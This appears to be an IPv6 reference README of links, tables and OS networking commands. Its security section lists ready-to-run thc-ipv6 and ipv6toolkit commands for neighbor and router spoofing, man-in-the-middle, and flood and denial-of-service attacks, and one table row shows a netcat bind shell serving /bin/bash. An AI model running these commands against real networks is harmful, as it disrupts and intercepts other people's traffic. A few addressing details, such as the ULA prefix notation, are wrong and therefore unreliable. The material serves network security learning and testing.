IPv6 Reference and Repository 📍

Hello and Welcome!

This is my IPv6 References repository. The goal is to provide key information regarding IPv6 of interest to anyone learning about or using IPv6.  This repository is a bunch of different stuff that I hope helps everyone is some way.

• This README.md page - with a ton of info (see below)
• Cheat Sheets
• Packet Captures
• RFC Documents
• more

If you have anything you would like to see added, please let me know.

📇Index of Items on This Page

• IPv6 Standards and RFC's
  
• IPv6 Statistics of Interest
  
• IPv6 Specific/Related/Capable Tools and Tool Sets
  
• Comparing IPv4 to IPv6
  
• IPv6 Address Types - Prefixes/Special
  
  • IPv6 Address Tools
    
  • IPv6 Address Notes
    
• IPv6 vs. IPv4 Multicast Address Comparison Chart
  
• IPv6 Usage in Various OS Systems
  
• Some IPv6 Basic Networking Commands
  
• Security in IPv6 Networking
  
  • IPv6 Security Reading and References
    
  • IPv6 Security Tools
    
  • IPv6 Tool Kit Command Examples
    
  • IPv6 addresses & domains Research/Investigation
    
  • Domain Name System and Autonomous System Research/Investigation
    

🔗Links to My Main Web Sites/IPv6 Repos

• The main CellStream, Inc. Web Site with tons of articles and how to's: https://www.cellstream.com
• The Online School of Network Sciences: https://www.netscionline.com (create a freee user account - lots of free References and more)
• My IPv6 Extension Header PCAPs can be found here: https://github.com/amwalding/IPv6_Extension_Header_PCAPs

📃IPv6 Standards and RFCs

I have a ZIP file in the repo called IPv6 RFCs.zip that contains all the RFC's. I update it from time to time. Essentially it is a complete library of the IPv6 related RFC's in TXT format in one place to save time.

To see all the IPv6 Related RFC's click here: https://www.rfc-editor.org/search/rfc_search_detail.php?page=25&title=ipv6

That said, there are some really important IPv6 RFC's I have listed below. This filtered list simply point to the online version of the RFC at the IETF web site.

Decription/Name	URL
Original Dec 1998 IPv6 Spec	https://www.rfc-editor.org/rfc/rfc2460.txt
IPv6 Addressing Architecture	https://www.rfc-editor.org/rfc/rfc4291.txt
Neighbor Discovery for IPv6	https://www.rfc-editor.org/rfc/rfc4861.txt
IPv6 Standardization	https://www.rfc-editor.org/rfc/rfc8200.txt

📈IPv6 Statistics of Interest

Name	URL
Google	https://www.google.com/intl/en/ipv6/statistics.html 👍
APNIC Labs	https://stats.labs.apnic.net/ipv6/ 👍
IPv6 BPG Table	https://bgp.potaroo.net/v6/as6447/ 👍
More IPv6 Stats	http://ipv6-test.com/stats/
Cisco	https://6lab.cisco.com/stats/
Top Alexa by country	https://www.vyncke.org/ipv6status/ 👍
NRO	https://www.nro.net/statistics
Ripe	https://www.ripe.net/publications/ipv6-info-centre/statistics-and-tools
World IPv6 Launch	http://www.worldipv6launch.org/measurements/
M.R.P.	http://www.mrp.net/ipv6_survey/
Microsoft IPv6 page	https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd379473(v=ws.10)?redirectedfrom=MSDN

🔨IPv6 Specific/Related/Capable Tools and Tool Sets

Description/Name	URL
Wireshark	https://www.wireshark.org 👍
Use Google to test IPv6	https://ipv6test.google.com/
Test your IPv6 Connectivity 1	http://test-ipv6.com
Test your IPv6 Connectivity 2	https://ipv6-test.com
Test your IPv6 Connectivity 3	http://v6.testmyipv6.com/
Test your IPv6 Connectivity 4	http://whatismyv6.com/
IPv6 Speed Test 1	http://www.speedtest6.com/
IPv6 Speed Test 2	http://ipv6-speedtest.net/
IPv6 addresses calculator	https://packages.debian.org/jessie/ipv6calc
IPv6 Security Testing: thc-ipv6	https://github.com/vanhauser-thc/thc-ipv6
IPv6 Security Testing: ipv6-toolkit	https://github.com/fgont/ipv6toolkit
Pinkie	http://www.ipuptime.net/pinkie/
Diagnostic tools	https://packages.debian.org/jessie/ndisc6
IPv6 DNS Lookup Tool	http://www.webdnstools.com/dnstools/dns-lookup-ipv6
Scapy	http://www.secdev.org/projects/scapy/
Chiron	http://www.secfu.net/tools-scripts/
Scanners	Nmap / Metasploit / Scan6 / Halfscan6
Online scanner	http://www.ipv6scanner.com/
Online scanner	http://www.subnetonline.com/pages/ipv6-network-tools/online-ipv6-port-scanner.php
Neighbor discovery protocol monitor	https://packages.debian.org/jessie/ndpmon
Netcat6	https://packages.debian.org/source/jessie/amd64/nc6
Scan detective	https://github.com/regulatre/ipv6-scan-detective
Rogue IPv6 router detector	https://github.com/xme/rrhunter
Evil foca	http://www.informatica64.com/
Firewall tester	https://github.com/timsgit/ipscan
Online Network Utilities	https://centralops.net/

🆚Comparing IPv4 to IPv6

Setting	IPv4	IPv6
Address Length	32 bits	128 bits
Transmission Types	Unicast / Broadcast / Multicast	Unicast / Multicast
Neighbor Discovery	ARP	NDP, ICMPv6
Address Configuration	Static/ICMP/DHCP	Static/ICMPv6/DHCPv6 (optional)
ICMP	ICMPv4	ICMPv6
Header Difference 1	Variable Length w/Options	Fixed length (40 bytes) w/Extensions
Header Difference 2	Header Checksum	No Header Checksum
Header Difference 3	Protocol	Next Header
Header Difference 4	TTL - Time to Live	Hop Limit
Header Difference 5	Not applicable	Flow Label (generally not used)
Fragmentation	Both in hosts and routers	Only in hosts, PMTU Discovery
Private Network Prefixes	10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16	Site Local fec0::/10, ULA fc00::/7, fd00::/8 but no translation
Loopback Address	127.0.0.1	::1
Multicast Address	224.x.y.z	FF0s::/8, where s is the scope

✉️IPv6 Address Types - Prefixes/Special

Address Type	Binary Prefix	IPv6 Notation
Link-local unicast	1111111010	fe80::/64
Site-local unicast	1111111011	fec0::/10 (deprecated)
Unique local address (ULA)	1111 110L	FC00::7 and FD00::7
Unspecified	00...0 (128 bits)	::/128
Loopback	00...1 (128 bits)	::1/128
Multicast	11111111	ff00::/8
Global Unicast Address (GUA)	0010	2xxx::/3

🔨IPv6 Address Tools

Tool Description	Link/Reference
Check your own GUA IPv6 Address (if you have one)	http://whatismyipv6address.com
Check out the full IPv6 Special Addresses	https://www.iana.org/assignments/iana-ipv6-special-registry/iana-ipv6-special-registry.xhtml
IPv6 Subnet Tool in Python	https://github.com/aipi/IPv6-subnet-calculator
IPv6 Subnet Calculator	https://subnetonline.com/pages/subnet-calculators/ipv6-subnet-calculator.php

📓Notes on Addressing

• Every device selects a Link-local unicast address that is unique
• Interfaces can have multiple IPv6 Addresses
• Public prefix provided either by Router Advertisement or DHCPv6
• No more need of "NAT"
• Fragmentation function removed from routers, replaced by Path MTU Discovery

🆚IPv6 vs. IPv4 Multicast Address Comparison Chart

IPv6 Address	Description	IPv4 Address	Description
na	na	224.0.0.0	Multicast Network Address (Reserved)
FF02::1	All Nodes on Link Local	224.0.0.1	All systems on the subnetwork
FF02::2	All Routers on Link Local	224.0.0.2	All Routers on the subnetwork
FF02::3	Unassigned	224.0.0.3	Unassigned
FF02::4	DVMRP Routers	224.0.0.4	DVMRP Routers
FF02::5	All OSPF Routers	224.0.0.5	All OSPF Routers
FF02::6	ll OSPF Designated Routers	224.0.0.6	All OSPF Designated Routers
FF02::7	ST Routers	224.0.0.7	ST Routers
FF02::8	ST Hosts	224.0.0.8	ST Hosts
FF02::9	RIPv2 Routers	224.0.0.9	RIPv2 Routers
FF02::A	EIGRP Routers	224.0.0.10	IGRP Routers
FF02::B	Mobile Agents	224.0.0.11	Mobile Agents
FF02::C	DHCP Servers/Relay Agents	224.0.0.12	DHCP Servers/Relay Agents
FF02::D	All PIM Routers	224.0.0.13	All PIM Routers
FF02::E	RSVP-Encapsulation	224.0.0.14	RSVP-Encapsulation

💻IPv6 Usage in Various OS Systems

Operating System	Link to Article
Windows IPv6 Command Line Examples	https://www.cellstream.com/2013/09/12/ipv6-windowslinux-command-line-examples/ 👍
MAC OS IPv6 Command Line Examples	https://www.cellstream.com/2013/09/12/ipv6-osx-command-line-examples/ 👍
GNU/Linux IPv6 Command Line Examples	https://www.cellstream.com/2013/09/12/ipv6-linux-command-line-examples/ 👍
Neighbor Discovery (ND) Table in IPv6 Windows, Linux and MAC Machines	https://www.cellstream.com/2013/09/12/neighbor-discovery-nd-table-in-ipv6-windows-machines/
Enabling IPv6 on a Computer (Windows/MAC/Linux)	https://www.cellstream.com/2013/09/12/enabling-ipv6-on-a-computer/
Disabling IPv6 on Windows	https://www.cellstream.com/2013/09/12/disabling-ipv6-communications/

💻Some IPv6 Basic Networking Commands by OS

Replace IPV6ADDR with the IPv6 address in the commands below. Replace DOMAIN with the Domain Name in the commands below. Replace INTFC with the system name for the network interface below.

Note

If you have any that I should add, please let me know.

Important

The best ping to test worldwide IPv6 connectivity $ ping 2600::1 or ping6 2600::1 This is actually SPRINT's IPv6 address.

Action	Linux Command	MAC OS Command	Windows Command	Notes
Display IPv6 Settings	$ sysctl net.ipv6	$ sysctl net.inet6		Attempt to show what IPv6 settings are present in the OS
General IP Interface Configuration 1	$ ifconfig or $ ip -6 a s INTFC	$ ifconfig	$ ipconfig or $ ipconfig /all or $ netsh interface ipv6 show addresses	These are network interface configuration settings
General IPv6 Interface Configuration 2	$ ifconfig -a or $ cat /proc/net/if_inet6	$ ifconfig -a or for a specific interface $ ifconfig -L en0 inet6	$ netsh int ipv6 show global	These are network interface configuration settings
Support for Temporary IPv6 Addresses		$ sysctl net.inte6 | grep temp		Different OS versions support different IPv6 addressing features
Ping an IPv6 Address	$ ping6 -I eth0 IPV6ADDR	$ ping6 IPV6ADDR	$ pathping -6 DOMAIN	Use ICMP Ping to see if the target device is able to answer
Domain ping	$ ping6 -I eth0 DOMAIN	$ ping6 DOMAIN		Use ICMP Ping to see if a given domain name can be resolved and then reached
Traceroute	$ traceroute6 DOMAIN or $ tracepath -n IPV6ADDR	$ traceroute6 DOMAIN	$ tracert -6 DOMAIN	What is the path of routers to a given IPv6 destination
Traceroute EH-enabled	$ sudo ./path6 -v -u 72 -d DOMAIN
Traceroute with MTR	$ mtr -6 DOMAIN
Trace the path to discover the MTU	$ tracepath6 DOMAIN			Same as traceroute except with MTU allowed
View IPv6 Connections	$ netstat -A inet6			What IPv6 connections exist on the system
Display the Routing Table	$ ip -6 route or $ netstat -rnA inet6 or $ sudo route -A inet6	$ netstat -r -f inet6	$ route print -6	Display the routing table of the system
Display Neighbor Discovery Cache	$ ip -6 neigh show			Display the Neighbor Discovery cach of the system (the replacement of the ARP cache)
Flush the Neighbor Discovery Cache	$ ip -6 neigh flush			Clear the Neighbor cache to force rediscovery
Display the PMTU information	$ ip route get IPV6ADDR and $ tracepath -n IPV6ADDR		$ netsh interface ipv6 show destinationcache address	Attempt to display the Path MTU information for a given destination
DNS lookup	$ host DOMAIN	Check DNS $ scutil --dns | grep nameserver | grep "::" Lookup: $ dig AAAA DOMAIN		Looking up IPv6 DNS records
IP show	$ ip -6 addr or $ sudo ifconfig	$ grep inet6
IPv6 Routing tables/IPtables	$ sudo ip6tables -L -v --line-numbers or route -A inet6	$ netstat -r -f inet6	$ route print -6 or $ netstat -r
Any IPv6 Traffic?	$ netstat -ps -6	netstat -s -f inet6	$ netstat -ps IPv6
Any ICMPv6 Traffic?			$ netstat -ps ICMPv6
NETCAT	Listen $ nc6 -lp 12345 -v -e "/bin/bash" & Connect $ nc6 localhost 12345
SSH	$ ssh -6 user@IPV6ADDR%eth0			Using SSH in IPv6 mode
TCPDUMP	$ sudo tcpdump -i eth0 -evv ip6 or $ proto ipv6
TELNET	$ telnet IPV6ADDR PORT
Determining Address Type	$ addr6 -a IPV6ADDR			Requires addr6 tool
Identifying the Flow ID generation policy	$ sudo ./flow6 -i eth0 -v --flow-label-policy -d IPV6ADDR			Requires flow6 tool

🔒Security in IPv6 Networking

Warning

The content below is provided as educational information. Executing some of the commands shown with certain tools installed can be considered malicious by others. Please use caution when using any of the information below.

I would like to start with the following statement: IPv6 should not be considered any more or less secure than IPv4.

That said, there are known vulnerabilities in IPv6 with a number of exploits. Below are some IPv6 security references and tools.

📓IPv6 Security Reading and References

Reference Name	URL/RFC
IPv6 Fragmentation Attack	https://www.cellstream.com/2019/08/06/example-ipv6-frag-attack/
Example IPv6 SYN Flood Attack	https://www.cellstream.com/2019/08/05/example-ipv6-syn-flood-attack/
The Chiron IPv6 Security Assessment home on Github	https://github.com/aatlasis/Chiron
Monitoring new related IPv6 vulnerabilites	https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=ipv6
IPv6 attack detector	https://github.com/mzweilin/ipv6-attack-detector/ https://www.honeynet.org/node/944
Observations on the Dropping of Packets with IPv6 Extension Headers in the Real World	https://datatracker.ietf.org/doc/html/rfc7872
Rogue IPv6 Router Advertisement	https://www.rfc-editor.org/rfc/rfc6104.txt
Neighbor Discovery Problems	https://www.rfc-editor.org/rfc/rfc6583.txt
A Discard Prefix for IPv6	https://tools.ietf.org/html/rfc6666
Network Reconnaissance in IPv6	https://www.rfc-editor.org/rfc/rfc7707.txt

🛠️IPv6 Security Tools

Note

I believe both these tool sets are standard in Parrot Linux, you can add the ipv6toolkit to Kali with $ sudo apt install ipv6toolkit

Name	Link URL
IPv6 Security Testing: thc-ipv6	https://github.com/vanhauser-thc/thc-ipv6
IPv6 Security Testing: ipv6-toolkit	https://github.com/fgont/ipv6toolkit
Creating IPv6 Packets: scapy	https://scapy.net https://www.ernw.de/download/Advanced%20Attack%20Techniques%20against%20IPv6%20Networks-final.pdf

💻IPv6 Tool Kit Command Examples

Action	Command	Notes
IPv6 implementation test	$ sudo ./implementation6 eth0 TARGETIPv6ADDR	Tests various IPv6 specific options for their implementations. It can also be used to test firewalls
Scan the IPv6 Network with nmap	$ nmap -6 -sT DOMAIN	::1 for localhost
Domain scanning	$ sudo ./scan6 -v -i eth0 -­d DOMAIN/64	Scans a provided DOMAIN
Address scanning	$ sudo ./scan6 -v -i eth0 -­d IPv6ADDR/64	Scans a specified prefix
Local scan	$ sudo ./scan6 -i eth0 --local-scan --rand-src-addr --verbose	Scans for Link-local & Global addresses
Discover global IPv6 addressed devices & MAC addresses	$ sudo ./scan6 -i eth0 -L -e --print-type global	Scans for Global IPv6 addresses by MAC
Get IPv6 from a MAC addresses	$ sudo ./inverse_lookup6 eth0 MACADDR	Who has MAC Address XX:XX:XX:XX:XX:XX? Tell me your IPv6 address.
Listen for activities on local network	$ sudo ./alive6 eth0 -v	Detect ICMPv6 echo-reply on global addresses
Metasploit	msf > search type:auxiliary ipv6	Yes, this is the beginning of a deep pond, so we will just mention this
Send ICMPv6 echo-request 1	$ ping6 ff02::1%eth0	All nodes address - RFC4291
Send ICMPv6 echo-request 2	$ ping6 ff02::2%eth0	All Routers address - RFC4291
DAD (Duplicate Address Detection)	$ sudo ./na6 -i eth0 --accept-src ::/128 --solicited --override --listen --verbose or $ sudo ./dos-new-ip6 eth0	DAD is the mechanism of IPv6 stateless autoconfiguration to detect whether an IPv6 address exists on the network. Every time a new computer asks about IPv6 existence, the attacker replies and claims that he is that IPv6. The new computer cannot join the network since it does not have IPv6 address. It use ICMPv6 neighbor solicitation which sends to all nodes multicast address
Monitoring Duplicate Address Detection	$ sudo ./detect-new-ip6 eth0	Listens for new DAD announcements
Neighbor Solicitation Monitoring passively	$ sudo ./passive_discovery6 eth0	Just listening!
Neighbor Solicitation	$ sudo ./flood_solicitate6 eth0 TARGETIPv6ADDR	Flood the network with neighbor solicitations. If no target is supplied, query address will be 'ff02::1'
Neighbor Solitication Interceptor	$ sudo ./na6 -i eth0 --accept-target TARGETIPv6ADDR --listen -E 11::33:44:55:66 --solicited --override --verbose $ sudo ./parasite6 -l eth0	This redirects all local traffic to you by answering falsely to Neighbor Solitication requests
Neighbor Advertisement	$ sudo ./flood_advertise6 eth0 TARGETIPv6ADDR or $ sudo ./na6 -i eth0 --target TARGETIPv6ADDR --dst-address ff02::1 --override -E 1:2:3:4:5:6 --loop --verbose	Flood the local network with neighbor advertisements. The performance on IPv6 host neighbor tables will degrade and cause a DoS
ICMPv6 Router Discovery	$ rdisc6 eth0	Locates IPv6 Routers on a network segment
Router Advertisement	$ sudo ./flood_router26 eth0	Flood the local network with router advertisements. Many OS do not have an upper limit to the number of network a machine can belong to. All their resources can be consumed trying to join thousands of fake IPv6 networks
Router Advertisement MITM	$ sudo ./fake_router26 eth0 'fake_router26 -h' has many interesting options	Announce yourself as a router and become the default router.
RA - Advertise a malicious Current Hop Limit	$ sudo ./ra6 -i eth0 --src-address ROUTERADDR --dst-address TARGETIPv6ADDR --curhop HOPS --loop 1 --verbose	Advertise a malicious Current Hop Limit such that packets are discarded by the intervening routers
RA - Advertise a malicious MTU	$ sudo ./ra6 -i eth0 --src-address ROUTERADDR --dst-address TARGETIPv6ADDR -M MTU --loop 1 --verbose	Advertise a small Current Hop Limit such that packets are discarded by the intervening routers
RA - Disable the existing Router	$ sudo ./ra6 -i eth0 --src-address ROUTERADDR --dst-address TARGETIPv6ADDR --lifetime 0 --loop 1 --verbose	Impersonate the local router and send a Router Advertisement with a "Router Lifetime" small value. The victim host will remove the router from the 'default routers list'
Router lifetime 0	$ sudo ./kill_router6 eth0 ROUTERADDR	Router Advertisement with Router Lifetime set to 0. It announce to 'ff02:1' that a router is going down to delete it from the routing tables. '*' as router-address will sniff the network for RAs and immediately send a kill packet
TooBig error messages	$ sudo ./ndpexhaust26 -c -r -p eth0 TARGETIPv6ADDR	Flood the target /64 network with ICMPv6 TooBig error messages. Perform NDP Exhaustion attacks with ICMPv6 TooBig and EchoRequest (Fortinet & Cisco sensitive from Fernando Gont test
Smurf attack	$ sudo ./smurf6 eth0 TARGETIPv6ADDR	Flood the target with network traffic amplification. Send ICMPv6 echo requests to 'FF02::1' with the spoofed source from the attack target
Fragments management	$ sudo ./frag6 -i eth0 --flood-frags 10000 --loop --dst-address TARGETIPv6ADDR --verbose or $ sudo ./frag6 -i eth0 --flood-frags 100 --loop --src-address ::/0 --dst-address TARGETIPv6ADDR --verbose	Flood the reassembly table with imcomplete fragment packets. Only working with poor fragment reassembly queue management
Fragmentation	$ sudo ./frag6 -i eth0 --frag-id-policy --dst-address TARGETIPv6ADDR --verbose	Predictable Identification values result in an information leakage that can be exploited in a number of ways like to perform a Idle-scan, DoS attacks (fragment ID collisions), uncover the rules of a number of firewalls or count the number of systems behind a middle-box for example
Atomic fragments	$ sudo ./frag6 -i eth0 --frag-type atomic --frag-id 100 --dst-address TARGETIPv6ADDR --verbose	Atomic fragments are IPv6 packets which are not fragmented but still contain a (redundant) Fragment Header. IPv6 packets that contain a Fragment Header with the Fragment Offset set to 0 and the M flag set to 0. If atomic fragments overlap both of the other ones, all of them can be discarded
Fragment reassembly policy	$ sudo ./frag6 -i eth0 -v --frag-reass-policy --dst-address TARGETIPv6ADDR --verbose	Assess fragment reassembly policy
Fragment firewall and implementation tests	$ sudo ./fragmentation6 eth0 TARGETIPv6ADDR	The tool fragmentation6 can perform a fragment firewall and implementation check
TCP SYN	$ sudo ./thcsyn6 eth0 TARGETIPv6ADDR DSTPORT 'thcsyn6 -h' has interesting options, or $ sudo ./tcp6 -i eth0 --src-address SRCIPv6ADDR --dst-address TARGETIPv6ADDR --dst-port DSTPORT --tcp-flags S --flood-sources 100 --loop --sleep 1 --verbose	Flood the target with TCP-SYN packets. Destination port can be randomized if you supply "x" as port
Buffer / Connections	$ sudo ./tcp6 -i eth0 --dst-address TARGETIPv6ADDR --dst-port 80 --listen --src-address TARGETIPv6ADDR/112 --flood-ports 10 --loop --rate-limit 100pps --data "GET / HTTP/1.0\r\n\r\n" --close-mode LAST-ACK	A buffer/connections flood can be done by TCP-SYN with no controlling process and will make a lots of queue data for such connections
Other denial of services	$ sudo ./denial6 eth0 TARGETIPv6ADDR CASENUMBER	The tools 'denial6' allow to performs various denial of services attacks. Case number : 1 : large hop-by-hop header with router-alert and filled with unknown options 2 : large destination header filled with unknown options 3 : hop-by-hop header with router alert option plus 180 headers 4 : hop-by-hop header with router alert option plus 178 headers + ping 5 : AH header + ping 6 : first fragments of a ping with a hop-by-hop header with router alert 7 : large hop-by-hop header filled with unknown options (no router alert
Firewall audit & Filter bypass tests	$ sudo ./firewall6 -H eth0 TARGETIPv6ADDR DSTPORT # Option '-u' for UDP	Performs various access control & bypass attempts to check implementations
Search for a black hole	$ blackhole6 and other options with $ scan6	Search for a black hole can be useful to find out who is dropping specific packets, network reconnaissance or just checking if you EH-enabled attacks would work
Playing with IPv6 Addressing	$ addr6 Look at $ man addr6 then try `$ cat file.txt	addr6 -i -s`

🔍IPv6 addresses & domains Research/Investigation

Name	URL
IP research	https://whatismyipaddress.com/
BGP Toolkit	http://bgp.he.net/
BGP IPv6 progress report	http://bgp.he.net/ipv6-progress-report.cgi
DNS	A domain analysis could reveal IPv6 addresses (AAAA & PTR records)
SSL	An SSL analysis could reveal IPv6 addresses too
IPv4 - IPv6	Search for dual stacked host
Google dorks	site:ipv6.*
Recent websites validated	http://ipv6-test.com/validate.php
Recent websites added	http://sixy.ch/
Shodan	https://www.shodan.io/
IPv6 map's project	https://mrlooquer.com/
Dual Stack Chart	http://ipv6eyechart.ripe.net/
TCP utils	http://www.tcpiputils.com/
Ultra tools	https://www.ultratools.com/tools/asnInfo
Black list	https://mxtoolbox.com/blacklists.aspx
extract_hosts6.sh	https://github.com/vanhauser-thc/thc-ipv6/blob/master/extract_hosts6.sh
extract_networks6.sh	https://github.com/vanhauser-thc/thc-ipv6/blob/master/extract_networks6.sh

🔍Domain Name System and Autonomous System Research/Investigation

Action	Command
DNS lookup	$ nslookup -query=AAAA DOMAIN
DNS lookup	$ host -t AAAA DOMAIN
DNS lookup	$ dig -6 AAAA DOMAIN
Reverse lookup	$ dig -x IPv6ADDR
DNS enumeration	$ ./dnsdict6 -d DOMAIN
DNS enumeration (PTR request)	$ ./dnsrevenum6 DNSSERVER IPv6ADDR/64
DNS lookup with a domain list	$ cat domainsList.txt | sudo script6 get-aaaa
DNS enumeration	$ sudo script6 get-bruteforce-aaaa DOMAIN
AS-related info	$ sudo script6 get­-as IPv6ADDR
AS-related info	$ sudo script6 get­-asn IPv6ADDR
Google DNS	IPv4 : 8.8.4.4, 8.8.8.8 IPv6 : 2001:4860:4860::8888, 2001:4860:4860::8844
IPv6 rDNS Nameservers	http://bgp.he.net/ipv6-progress-report.cgi?section=ipv6_rdns